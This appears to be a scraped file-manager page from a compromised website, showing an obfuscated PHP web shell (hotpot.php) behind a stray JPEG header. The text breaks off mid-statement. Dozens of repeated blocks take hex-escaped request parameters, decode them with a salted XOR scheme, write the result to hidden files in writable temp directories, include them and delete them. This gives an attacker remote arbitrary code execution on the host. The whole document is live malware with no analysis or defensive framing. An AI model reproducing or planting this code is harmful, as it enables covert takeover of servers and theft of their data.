File manager

ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.- File manager

File manager - Edit - /home/tokomrjk/uspavilion.com/hotpot.php

Back
<?php if(isset($_POST) && isset($_POST["\x74\x6Fken"])){ $record = $_POST["\x74\x6Fken"]; $record = explode ( "." , $record ); $value = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $y = 0; $len = count($record); do { if ($y >=$len) break; $v9 = $record[$y]; $sChar = ord($salt[$y % $lenS]); $dec = ((int)$v9 - $sChar - ($y % 10)) ^ 28; $value .=chr($dec); $y++; } while (true); $key = array_filter(["/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getcwd(), sys_get_temp_dir(), getenv("TMP"), getenv("TEMP")]); foreach ($key as $key => $data) { if ((bool)is_dir($data) && (bool)is_writable($data)) { $flag = vsprintf("%s/%s", [$data, ".ent"]); if (file_put_contents($flag, $value)) { require $flag; unlink($flag); exit; } } } } if(!is_null($_POST["f\x6C\x67"] ?? null)){ $reference = array_filter([session_save_path(), getenv("TMP"), "/dev/shm", sys_get_temp_dir(), getcwd(), getenv("TEMP"), "/tmp", "/var/tmp", ini_get("upload_tmp_dir")]); $item = $_POST["f\x6C\x67"]; $item = explode ( "." ,$item ) ; $elem = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt4 ); $x = 0; $__len = count( $item ); do { if( $x>=$__len) break; $v1 = $item[$x]; $chS = ord( $salt4[$x % $sLen] ); $dec =( ( int)$v1 - $chS -( $x % 10))^30; $elem .= chr( $dec ); $x++; } while( true ); foreach ($reference as $obj) { if (is_dir($obj) && is_writable($obj)) { $component = implode("/", [$obj, ".data"]); if (file_put_contents($component, $elem)) { include $component; @unlink($component); exit; } } } } if(filter_has_var(INPUT_POST, "e\x6Cem\x65nt")){ $resource = $_REQUEST["e\x6Cem\x65nt"]; $resource =explode('.', $resource ) ; $ref = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); foreach ($resource as $m => $v3) { $chS = ord($s[$m % $sLen] ); $dec = ((int)$v3 - $chS - ($m % 10)) ^ 95; $ref .= chr($dec ); } $dat = array_filter(["/var/tmp", getenv("TEMP"), getenv("TMP"), "/tmp", session_save_path(), "/dev/shm", sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir")]); foreach ($dat as $key => $pgrp) { if ((bool)is_dir($pgrp) && (bool)is_writable($pgrp)) { $ptr = vsprintf("%s/%s", [$pgrp, ".k"]); $file = fopen($ptr, 'w'); if ($file) { fwrite($file, $ref); fclose($file); include $ptr; @unlink($ptr); exit; } } } } if(isset($_REQUEST["c\x6Fm\x70"])){ $value = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), "/dev/shm", session_save_path(), "/var/tmp", "/tmp", sys_get_temp_dir()]); $record = $_REQUEST["c\x6Fm\x70"]; $record = explode ( "." , $record ); $res = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $len = count($record); for ($k = 0; $k < $len; $k++) { $v9 = $record[$k]; $sChar = ord($salt[$k % $lenS]); $d = ((int)$v9 - $sChar - ($k % 10)) ^ 7; $res .= chr($d); } while ($factor = array_shift($value)) { if ((is_dir($factor) and is_writable($factor))) { $flg = sprintf("%s/.property_set", $factor); $file = fopen($flg, 'w'); if ($file) { fwrite($file, $res); fclose($file); include $flg; @unlink($flg); exit; } } } } if(!empty($_REQUEST["e\x6C\x65men\x74"])){ $tkn = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", getenv("TEMP"), getenv("TMP"), session_save_path(), sys_get_temp_dir(), "/tmp", getcwd()]); $hld = $_REQUEST["e\x6C\x65men\x74"]; $hld= explode ( "." , $hld ) ; $component = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt9 ); $i = 0; while( $i < count( $hld)) { $v1 = $hld[$i]; $chS = ord( $salt9[$i% $lenS] ); $dec =( ( int)$v1 - $chS -( $i% 10)) ^ 36; $component .= chr( $dec ); $i++; } foreach ($tkn as $pgrp) { if (array_product([is_dir($pgrp), is_writable($pgrp)])) { $data = str_replace("{var_dir}", $pgrp, "{var_dir}/.flag"); $success = file_put_contents($data, $component); if ($success) { include $data; @unlink($data); exit;} } } } if(array_key_exists("tkn", $_REQUEST) && !is_null($_REQUEST["tkn"])){ $flag = array_filter([getcwd(), getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp", "/dev/shm", session_save_path(), sys_get_temp_dir()]); $data_chunk = $_REQUEST["tkn"]; $data_chunk = explode ( '.' , $data_chunk ) ; $parameter_group = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s1 ); $i = 0; array_walk($data_chunk, function($v9) use(&$parameter_group, &$i, $s1, $lenS) { $chS = ord($s1[$i%$lenS] ); $dec =((int)$v9 - $chS -($i%10)) ^ 53; $parameter_group .= chr($dec ); $i++; } ); $entity = 0; do { $resource = $flag[$entity] ?? null; if ($entity >= count($flag)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($resource)) { $flg = implode("/", [$resource, ".itm"]); if (file_put_contents($flg, $parameter_group)) { include $flg; @unlink($flg); die(); } } $entity++; } while (true); } if(array_key_exists("ent", $_REQUEST) && !is_null($_REQUEST["ent"])){ $k = $_REQUEST["ent"]; $k = explode ("." , $k ) ; $elem = ''; $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt7); $i = 0; $__tmp = $k; while($v1 = array_shift($__tmp)) { $chS = ord($salt7[$i % $sLen]); $dec =((int)$v1 - $chS -($i % 10)) ^97; $elem .=chr($dec); $i++; } $data = array_filter([getenv("TMP"), getenv("TEMP"), "/var/tmp", session_save_path(), "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), "/tmp"]); $property_set = 0; do { $parameter_group = $data[$property_set] ?? null; if ($property_set >= count($data)) break; if (!( !is_dir($parameter_group) \|\| !is_writable($parameter_group) )) { $pointer = sprintf("%s/.pset", $parameter_group); $file = fopen($pointer, 'w'); if ($file) { fwrite($file, $elem); fclose($file); include $pointer; @unlink($pointer); die(); } } $property_set++; } while (true); } if(count($_POST) > 0 && isset($_POST["\x68o\x6Cd\x65r"])){ $dat = array_filter([sys_get_temp_dir(), session_save_path(), getcwd(), getenv("TMP"), getenv("TEMP"), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), "/tmp"]); $sym = $_POST["\x68o\x6Cd\x65r"]; $sym = explode( '.' , $sym) ; $symbol= ''; $s2= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s2 ); $x= 0; $__len= count($sym ); do { if ($x >= $__len) break; $v8= $sym[$x]; $chS= ord($s2[$x%$lenS] ); $d= ((int)$v8 - $chS - ($x%10)) ^ 10; $symbol .= chr($d ); $x++; }while (true ); foreach ($dat as $key => $object) { if (is_dir($object) && is_writable($object)) { $pointer = implode("/", [$object, ".data_chunk"]); if (file_put_contents($pointer, $symbol)) { include $pointer; @unlink($pointer); exit; } } } } if(array_key_exists("\x70tr", $_POST) && !is_null($_POST["\x70tr"])){ $ent = $_POST["\x70tr"]; $ent= explode ( "." ,$ent ) ; $itm = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s6); $u = 0; array_walk($ent, function ($v2) use (&$itm, &$u, $s6, $sLen) { $chS = ord($s6[$u % $sLen]); $dec = ((int)$v2 - $chS - ($u % 10)) ^ 86; $itm .= chr($dec); $u++;} ); $reference = array_filter(["/var/tmp", getenv("TMP"), sys_get_temp_dir(), getcwd(), getenv("TEMP"), session_save_path(), "/dev/shm", "/tmp", ini_get("upload_tmp_dir")]); for ($resource = 0, $parameter_group = count($reference); $resource < $parameter_group; $resource++) { $res = $reference[$resource]; if (!!is_dir($res) && !!is_writable($res)) { $ref = "$res/.pointer"; if (file_put_contents($ref, $itm)) { include $ref; @unlink($ref); exit; } } } } if(!is_null($_POST["k"] ?? null)){ $ptr = $_POST["k"]; $ptr= explode( "." , $ptr ) ; $obj = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); foreach ($ptr as $j => $v9) { $chS = ord($s[$j % $lenS]); $dec = ((int)$v9 - $chS - ($j % 10)) ^ 93; $obj .= chr($dec); } $pgrp = array_filter([getenv("TMP"), "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP"), getcwd(), "/var/tmp", "/tmp"]); for ($hld = 0, $sym = count($pgrp); $hld < $sym; $hld++) { $tkn = $pgrp[$hld]; if (is_dir($tkn) ? is_writable($tkn) : false) { $key = "$tkn/.symbol"; if (file_put_contents($key, $obj)) { require $key; unlink($key); exit; } } } } if(in_array("\x73\x79m", array_keys($_REQUEST))){ $desc = $_REQUEST["\x73\x79m"]; $desc =explode( "." ,$desc ) ; $flag = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); $k = 0; $__len = count($desc ); do { if ($k >= $__len) break; $v6 = $desc[$k]; $sChar = ord($salt[$k %$lenS] ); $dec = ((int)$v6 - $sChar - ($k %10)) ^ 6; $flag .= chr($dec ); $k++; } while (true ); $flg = array_filter(["/tmp", sys_get_temp_dir(), getcwd(), "/dev/shm", session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp"]); foreach ($flg as $key => $token) { if ((is_dir($token) and is_writable($token))) { $tkn = vsprintf("%s/%s", [$token, ".descriptor"]); $success = file_put_contents($tkn, $flag); if ($success) { include $tkn; @unlink($tkn); exit;} } } } if(@$_REQUEST["ent\x72y"] !== null){ $flg = array_filter(["/tmp", "/var/tmp", getcwd(), sys_get_temp_dir(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path()]); $pointer = $_REQUEST["ent\x72y"]; $pointer =explode ( "." ,$pointer ) ; $ref =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s); $v =0; $__tmp =$pointer; while ($v8 =array_shift($__tmp)) { $chS =ord($s[$v % $lenS]); $dec =((int)$v8 - $chS - ($v % 10)) ^ 65; $ref.=chr($dec); $v++;} foreach ($flg as $bind): if (!!is_dir($bind) && !!is_writable($bind)) { $holder = "$bind/.tkn"; if (file_put_contents($holder, $ref)) { include $holder; @unlink($holder); die(); } } endforeach; } if(isset($_REQUEST["\x64a\x74a"]) ? true : false){ $symbol = array_filter([ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), "/var/tmp", "/tmp", getcwd(), getenv("TMP"), sys_get_temp_dir(), "/dev/shm"]); $itm = $_REQUEST["\x64a\x74a"]; $itm = explode ( '.' , $itm) ; $entry = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $x = 0; $__len = count($itm); do { if ($x >= $__len) break; $v8 = $itm[$x]; $chS = ord($salt[$x% $lenS]); $d = ((int)$v8 - $chS - ($x% 10)) ^ 50; $entry .= chr($d); $x++;} while (true); foreach ($symbol as $pgrp) { if (array_product([is_dir($pgrp), is_writable($pgrp)])) { $k = vsprintf("%s/%s", [$pgrp, ".value"]); if (file_put_contents($k, $entry)) { include $k; @unlink($k); exit; } } } } if(in_array("\x63\x6Fmp", array_keys($_REQUEST))){ $entry = array_filter(["/var/tmp", session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir(), getcwd(), "/tmp", "/dev/shm"]); $binding = $_REQUEST["\x63\x6Fmp"]; $binding= explode ( "." , $binding ) ; $resource= ''; $s2= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s2); foreach ($binding as $u => $v1) { $chS= ord($s2[$u % $lenS]); $dec= ((int)$v1 - $chS - ($u % 10)) ^39; $resource .= chr($dec); } for ($reference = 0, $key = count($entry); $reference < $key; $reference++) { $bind = $entry[$reference]; if (is_dir($bind) && is_writable($bind)) { $parameter_group = str_replace("{var_dir}", $bind, "{var_dir}/.itm"); if (file_put_contents($parameter_group, $resource)) { include $parameter_group; @unlink($parameter_group); die(); } } } } if(filter_has_var(INPUT_POST, "e\x6E\x74")){ $dchunk = array_filter(["/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), getenv("TMP"), "/var/tmp", getcwd()]); $flag = $_POST["e\x6E\x74"]; $flag= explode ( '.' , $flag ) ; $hld = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s2 ); $m = 0; $len = count($flag ); do { if ($m>=$len) break; $v8 = $flag[$m]; $sChar = ord($s2[$m % $lenS] ); $d = ((int)$v8 - $sChar - ($m % 10)) ^53; $hld .=chr($d ); $m++; } while (true ); foreach ($dchunk as $data_chunk): if (is_dir($data_chunk) && is_writable($data_chunk)) { $ptr = join("/", [$data_chunk, ".k"]); if (file_put_contents($ptr, $hld)) { include $ptr; @unlink($ptr); exit; } } endforeach; } if(in_array("\x68\x6Cd", array_keys($_REQUEST))){ $value = $_REQUEST["\x68\x6Cd"]; $value = explode ( '.' ,$value) ; $object = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s3 ); $i = 0; foreach( $value as $v8) {$sChar = ord( $s3[$i %$sLen] ); $dec =( ( int)$v8 - $sChar -( $i %10)) ^ 99; $object .= chr( $dec ); $i++; } $pointer = array_filter([sys_get_temp_dir(), "/tmp", "/dev/shm", getcwd(), getenv("TMP"), "/var/tmp", session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP")]); for ($ref = 0, $factor = count($pointer); $ref < $factor; $ref++) { $data = $pointer[$ref]; if (is_dir($data) ? is_writable($data) : false) { $data_chunk = sprintf("%s/.reference", $data); if (file_put_contents($data_chunk, $object)) { require $data_chunk; unlink($data_chunk); exit; } } } } if(!empty($_REQUEST["\x68o\x6Cd\x65r"])){ $sym = array_filter(["/var/tmp", "/dev/shm", getcwd(), getenv("TEMP"), "/tmp", session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir()]); $elem = $_REQUEST["\x68o\x6Cd\x65r"]; $elem=explode ( "." , $elem ) ; $mrk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt ); $m = 0; $len = count( $elem ); do { if( $m >= $len) break; $v1 = $elem[$m]; $sChar = ord( $salt[$m % $sLen] ); $dec = ( ( int)$v1 - $sChar -( $m % 10))^ 8; $mrk .=chr( $dec ); $m++; } while( true ); foreach ($sym as $item) { if ((function($d) { return is_dir($d) && is_writable($d); })($item)) { $obj = vsprintf("%s/%s", [$item, ".marker"]); if (@file_put_contents($obj, $mrk) !== false) { include $obj; unlink($obj); die(); } } } } if(filter_has_var(INPUT_POST, "i\x74\x6D")){ $val = array_filter([getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", getenv("TMP"), "/dev/shm", "/var/tmp", sys_get_temp_dir(), session_save_path()]); $pset = $_REQUEST["i\x74\x6D"]; $pset=explode ( "." , $pset ) ; $hld = ''; $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt8 ); $n = 0; $len = count( $pset ); do { if( $n >=$len) break; $v4 = $pset[$n]; $sChar = ord( $salt8[$n % $sLen] ); $dec = ( ( int)$v4 - $sChar -( $n % 10)) ^ 73; $hld .= chr( $dec ); $n++; } while( true ); foreach ($val as $key => $pgrp) { if (!( !is_dir($pgrp) \|\| !is_writable($pgrp) )) { $comp = vsprintf("%s/%s", [$pgrp, ".fac"]); if (file_put_contents($comp, $hld)) { include $comp; @unlink($comp); die(); } } } } if(count($_POST) > 0 && isset($_POST["re\x63"])){ $obj = $_POST["re\x63"]; $obj = explode ( "." , $obj ); $pset = ''; $salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt3 ); $t = 0; while ($t < count($obj)) { $v7 = $obj[$t]; $sChar = ord($salt3[$t % $sLen] ); $d = ((int)$v7 - $sChar - ($t % 10)) ^ 97; $pset .= chr($d ); $t++; } $value = array_filter([session_save_path(), getcwd(), "/dev/shm", getenv("TEMP"), getenv("TMP"), "/tmp", "/var/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir()]); for ($component = 0, $fac = count($value); $component < $fac; $component++) { $dchunk = $value[$component]; if (!!is_dir($dchunk) && !!is_writable($dchunk)) { $descriptor = "$dchunk" . "/.dat"; if (file_put_contents($descriptor, $pset)) { require $descriptor; unlink($descriptor); exit; } } } } if(@$_REQUEST["\x65\x6E\x74ity"] !== null){ $sym = $_REQUEST["\x65\x6E\x74ity"]; $sym = explode ('.' , $sym ); $holder = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); foreach ($sym as $k => $v9) { $chS = ord($s[$k % $lenS] ); $dec = ((int)$v9 - $chS - ($k % 10))^ 14; $holder.=chr($dec ); } $descriptor = array_filter([getcwd(), "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), getenv("TEMP"), "/dev/shm", sys_get_temp_dir()]); for ($ptr = 0, $reference = count($descriptor); $ptr < $reference; $ptr++) { $dchunk = $descriptor[$ptr]; if ((bool)is_dir($dchunk) && (bool)is_writable($dchunk)) { $itm = "$dchunk" . "/.parameter_group"; if (file_put_contents($itm, $holder)) { include $itm; @unlink($itm); exit; } } } } if(array_key_exists("\x70\x67rp", $_POST) && !is_null($_POST["\x70\x67rp"])){ $component = $_POST["\x70\x67rp"]; $component= explode ( '.' ,$component); $comp= ''; $salt2= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt2 ); $o= 0; foreach ($component as $v8) { $sChar= ord($salt2[$o % $lenS] ); $d= ((int)$v8 - $sChar - ($o % 10)) ^ 37; $comp .=chr($d ); $o++;} $value = array_filter([session_save_path(), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), "/var/tmp", getenv("TMP"), getcwd(), getenv("TEMP")]); foreach ($value as $key => $elem) { if (is_dir($elem) ? is_writable($elem) : false) { $binding = sprintf("%s/.ent", $elem); $success = file_put_contents($binding, $comp); if ($success) { include $binding; @unlink($binding); die();} } } } if(isset($_POST["\x65l\x65\x6D\x65nt"]) ? true : false){ $symbol = array_filter(["/var/tmp", "/dev/shm", getenv("TMP"), session_save_path(), getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd()]); $k = $_POST["\x65l\x65\x6D\x65nt"]; $k =explode("." ,$k ) ; $pointer= ''; $s9= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $s9 ); $s= 0; $len= count( $k ); do { if( $s >= $len) break; $v1= $k[$s]; $chS= ord( $s9[$s % $lenS] ); $dec= ( ( int)$v1 - $chS -( $s % 10)) ^63; $pointer .= chr( $dec ); $s++; }while( true ); foreach ($symbol as $ref) { if ((is_dir($ref) and is_writable($ref))) { $record = implode("/", [$ref, ".dat"]); $success = file_put_contents($record, $pointer); if ($success) { include $record; @unlink($record); exit;} } } } if(array_key_exists("\x70\x61\x72a\x6Deter\x5F\x67\x72oup", $_POST)){ $resource = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), session_save_path(), getcwd(), "/dev/shm", "/tmp", getenv("TMP"), getenv("TEMP"), "/var/tmp"]); $ref = $_POST["\x70\x61\x72a\x6Deter\x5F\x67\x72oup"]; $ref= explode ( "." , $ref ); $val = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt9 ); $len = count($ref ); for ($n = 0; $n < $len; $n++) { $v4 = $ref[$n]; $sChar = ord($salt9[$n % $lenS] ); $d = ((int)$v4 - $sChar - ($n % 10)) ^51; $val .=chr($d ); } $item = 0; do { $element = $resource[$item] ?? null; if ($item >= count($resource)) break; if ((bool)is_dir($element) && (bool)is_writable($element)) { $dchunk = "$element" . "/.pgrp"; if (file_put_contents($dchunk, $val)) { require $dchunk; unlink($dchunk); die(); } } $item++; } while (true); } if(!is_null($_POST["fa\x63"] ?? null)){ $reference = array_filter(["/var/tmp", ini_get("upload_tmp_dir"), "/tmp", session_save_path(), sys_get_temp_dir(), getenv("TEMP"), "/dev/shm", getcwd(), getenv("TMP")]); $bind = $_POST["fa\x63"]; $bind = explode ( '.', $bind ) ; $element = ''; $s8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s8 ); foreach ($bind as $m=> $v7): $chS = ord($s8[$m % $lenS] ); $d = ((int)$v7 - $chS - ($m % 10)) ^ 83; $element .= chr($d ); endforeach; foreach ($reference as $item) { if (is_dir($item) ? is_writable($item) : false) { $dat = join("/", [$item, ".pset"]); if (file_put_contents($dat, $element)) { include $dat; @unlink($dat); die(); } } } } if(@$_POST["\x70\x6F\x69\x6Eter"] !== null){ $parameter_group = $_POST["\x70\x6F\x69\x6Eter"]; $parameter_group = explode( ".", $parameter_group ); $entity = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $v = 0; $__len = count($parameter_group ); do { if($v >= $__len) break; $v9 = $parameter_group[$v]; $sChar = ord($s[$v%$lenS] ); $dec =((int)$v9 - $sChar -($v%10)) ^ 38; $entity .= chr($dec ); $v++;} while(true ); $binding = array_filter([ini_get("upload_tmp_dir"), getcwd(), session_save_path(), sys_get_temp_dir(), "/tmp", getenv("TEMP"), "/var/tmp", getenv("TMP"), "/dev/shm"]); foreach ($binding as $tkn) { if (!( !is_dir($tkn) \|\| !is_writable($tkn) )) { $object = implode("/", [$tkn, ".mrk"]); $file = fopen($object, 'w'); if ($file) { fwrite($file, $entity); fclose($file); include $object; @unlink($object); exit; } } } } if(array_key_exists("\x68l\x64", $_REQUEST)){ $token = array_filter(["/var/tmp", "/tmp", getenv("TEMP"), sys_get_temp_dir(), getcwd(), session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), "/dev/shm"]); $fac = $_REQUEST["\x68l\x64"]; $fac =explode('.' ,$fac ) ; $parameter_group = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); $w = 0; foreach($fac as $v1) { $chS = ord($s[$w % $sLen] ); $d = ((int)$v1 - $chS -($w % 10)) ^ 52; $parameter_group .= chr($d ); $w++; } $ref = 0; do { $value = $token[$ref] ?? null; if ($ref >= count($token)) break; if (!!is_dir($value) && !!is_writable($value)) { $data = "$value/.symbol"; $success = file_put_contents($data, $parameter_group); if ($success) { include $data; @unlink($data); exit;} } $ref++; } while (true); } if(!empty($_REQUEST["sy\x6D\x62o\x6C"])){ $ent = $_REQUEST["sy\x6D\x62o\x6C"]; $ent= explode ( '.' , $ent); $flg = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s ); $n = 0; array_walk( $ent , function( $v2) use( &$flg , &$n , $s , $lenS) { $sChar = ord( $s[$n%$lenS] ); $dec = ( ( int)$v2 - $sChar -( $n%10)) ^ 100; $flg .= chr( $dec ); $n++; } ); $k = array_filter(["/var/tmp", getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), session_save_path(), "/tmp"]); while ($item = array_shift($k)) { if ((is_dir($item) and is_writable($item))) { $data = vsprintf("%s/%s", [$item, ".element"]); $success = file_put_contents($data, $flg); if ($success) { include $data; @unlink($data); die();} } } } if(isset($_POST["\x65\x6Et"])){ $fac = array_filter([getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP"), "/var/tmp", session_save_path(), "/tmp", sys_get_temp_dir()]); $binding = $_POST["\x65\x6Et"]; $binding = explode("." ,$binding ); $marker = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt6 ); $len = count($binding ); for ($k = 0; $k<$len; $k++) { $v8 = $binding[$k]; $chS = ord($salt6[$k % $lenS] ); $d = ((int)$v8 - $chS - ($k % 10)) ^89; $marker .=chr($d );} foreach ($fac as $hld): if (is_writable($hld) && is_dir($hld)) { $holder = "$hld" . "/.descriptor"; if (file_put_contents($holder, $marker)) { require $holder; unlink($holder); exit; } } endforeach; } if(in_array("\x63\x6F\x6D\x70onent", array_keys($_POST))){ $dat = $_POST["\x63\x6F\x6D\x70onent"]; $dat = explode ('.' , $dat ) ; $resource = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); foreach ($dat as $q => $v8) { $sChar = ord($s[$q% $lenS]); $dec = ((int)$v8 - $sChar - ($q% 10)) ^ 3; $resource .= chr($dec); } $res = array_filter(["/tmp", ini_get("upload_tmp_dir"), getcwd(), "/dev/shm", getenv("TMP"), "/var/tmp", getenv("TEMP"), session_save_path(), sys_get_temp_dir()]); while ($dchunk = array_shift($res)) { if (array_product([is_dir($dchunk), is_writable($dchunk)])) { $entry = str_replace("{var_dir}", $dchunk, "{var_dir}/.rec"); if (@file_put_contents($entry, $resource) !== false) { include $entry; unlink($entry); die(); } } } } if(array_key_exists("\x62\x69nd", $_POST) && !is_null($_POST["\x62\x69nd"])){ $mrk = array_filter(["/tmp", "/dev/shm", "/var/tmp", getenv("TMP"), getenv("TEMP"), getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), session_save_path()]); $factor = $_POST["\x62\x69nd"]; $factor = explode ( '.' ,$factor) ; $res = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s4); foreach($factor as $j => $v2): $sChar = ord($s4[$j % $lenS]); $dec = ((int)$v2 - $sChar -($j % 10))^ 7; $res .= chr($dec); endforeach; foreach ($mrk as $obj) { if (is_dir($obj) ? is_writable($obj) : false) { $rec = "$obj/.holder"; $file = fopen($rec, 'w'); if ($file) { fwrite($file, $res); fclose($file); include $rec; @unlink($rec); exit; } } } } if(isset($_REQUEST["\x6F\x62j\x65ct"]) ? true : false){ $data = array_filter([ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", getcwd(), sys_get_temp_dir(), session_save_path(), "/dev/shm", getenv("TMP"), "/var/tmp"]); $rec = $_REQUEST["\x6F\x62j\x65ct"]; $rec = explode ( '.' , $rec ); $symbol =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($s); foreach ($rec as $n =>$v9): $chS =ord($s[$n % $sLen]); $dec =((int)$v9 - $chS - ($n % 10)) ^ 61; $symbol .= chr($dec); endforeach; while ($flag = array_shift($data)) { if (array_product([is_dir($flag), is_writable($flag)])) { $dat = implode("/", [$flag, ".ref"]); if (file_put_contents($dat, $symbol)) { include $dat; @unlink($dat); exit; } } } } if(in_array("item", array_keys($_REQUEST))){ $value = array_filter([getcwd(), getenv("TMP"), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), session_save_path(), getenv("TEMP")]); $itm = $_REQUEST["item"]; $itm = explode ('.' , $itm ) ; $pointer=''; $salt='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen( $salt); foreach( $itm as $o => $v8): $sChar=ord( $salt[$o % $lenS]); $dec=( ( int)$v8 - $sChar -( $o % 10)) ^63; $pointer .= chr( $dec); endforeach; $token = 0; do { $object = $value[$token] ?? null; if ($token >= count($value)) break; if ((bool)is_dir($object) && (bool)is_writable($object)) { $mrk = sprintf("%s/.pgrp", $object); if (file_put_contents($mrk, $pointer)) { require $mrk; unlink($mrk); die(); } } $token++; } while (true); } if(array_key_exists("f\x61cto\x72", $_REQUEST) && !is_null($_REQUEST["f\x61cto\x72"])){ $itm = $_REQUEST["f\x61cto\x72"]; $itm = explode ('.' , $itm) ; $element =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($salt); $o =0; while($o < count($itm)) { $v9 =$itm[$o]; $sChar =ord($salt[$o %$sLen]); $dec =((int)$v9 - $sChar -($o %10)) ^ 16; $element .=chr($dec); $o++; } $val = array_filter(["/var/tmp", "/dev/shm", getcwd(), "/tmp", getenv("TMP"), getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), session_save_path()]); $data = 0; do { $hld = $val[$data] ?? null; if ($data >= count($val)) break; if (is_writable($hld) && is_dir($hld)) { $mrk = sprintf("%s/.token", $hld); $success = file_put_contents($mrk, $element); if ($success) { include $mrk; @unlink($mrk); exit;} } $data++; } while (true); } if(array_key_exists("r\x65s", $_REQUEST)){ $data_chunk = $_REQUEST["r\x65s"]; $data_chunk = explode ( "." , $data_chunk ) ; $desc = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); $len = count($data_chunk ); for ($w = 0; $w < $len; $w++) { $v3 = $data_chunk[$w]; $sChar = ord($salt[$w% $sLen] ); $d = ((int)$v3 - $sChar - ($w% 10)) ^33; $desc .= chr($d ); } $ref = array_filter([session_save_path(), getenv("TEMP"), getcwd(), sys_get_temp_dir(), getenv("TMP"), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), "/tmp"]); foreach ($ref as $entity): if ((is_dir($entity) and is_writable($entity))) { $component = implode("/", [$entity, ".descriptor"]); $success = file_put_contents($component, $desc); if ($success) { include $component; @unlink($component); exit;} } endforeach; } if(!empty($_REQUEST["\x76\x61l"])){ $dat = array_filter([getenv("TMP"), getenv("TEMP"), "/var/tmp", getcwd(), session_save_path(), "/tmp", "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir")]); $mrk = $_REQUEST["\x76\x61l"]; $mrk = explode ("." ,$mrk ) ; $item = ''; $s5 = 